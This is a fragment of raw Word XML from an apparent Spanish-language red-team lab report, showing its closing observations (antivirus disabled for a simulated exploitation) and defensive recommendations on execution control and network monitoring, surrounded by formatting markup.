        <w:framePr w:w="0" w:h="0" w:vAnchor="margin" w:hAnchor="text" w:x="0" w:y="0"/>
        <w:numPr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Observaciones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000068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El antivirus fue desactivado para facilitar la explotación, cumpliendo con los objetivos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000069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El escenario simula un entorno realista de Red Teaming con éxito en la explotación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000006A">
      <w:pPr>
        <w:framePr w:w="0" w:h="0" w:vAnchor="margin" w:hAnchor="text" w:x="0" w:y="0"/>
        <w:numPr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000000"/>
          <w:sz w:val="18"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Recomendaciones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000006B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Mejorar la configuración de seguridad en la máquina Windows, activando medidas como control de ejecución de archivos desconocidos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000006C">
      <w:pPr>
        <w:framePr w:w="0" w:h="0" w:vAnchor="margin" w:hAnchor="text" w:x="0" w:y="0"/>
        <w:numPr>
          <w:ilvl w:val="1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Monitorear tráfico en la red para detectar conexiones sospechosas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000006D"/>
    <w:sectPr>
      <w:footnotePr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>
    <w:charset w:val="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1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal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bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="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1">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal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2"/>
  <w:num w:numId="1">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="2"/>
    <w:lvlOverride w:ilvl="0">
      <w:lvl w:ilvl="0" w:tentative="1">
        <w:numFmt w:val="bullet"/>
        <w:suff w:val="tab"/>
        <w:lvlText w:val="·"/>
        <w:rPr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trackRevisions w:val="off"/>
  <w:compat>
    <w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="14"/>
  </w:compat>
  <w:footnotePr/>
  <w:endnotePr/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numbering" Target="numbering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Predeterminad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Masacre HD</dc:creator>
  <cp:lastModifiedBy>Masacre HD</cp:lastModifiedBy>
</cp:coreProperties>
</file>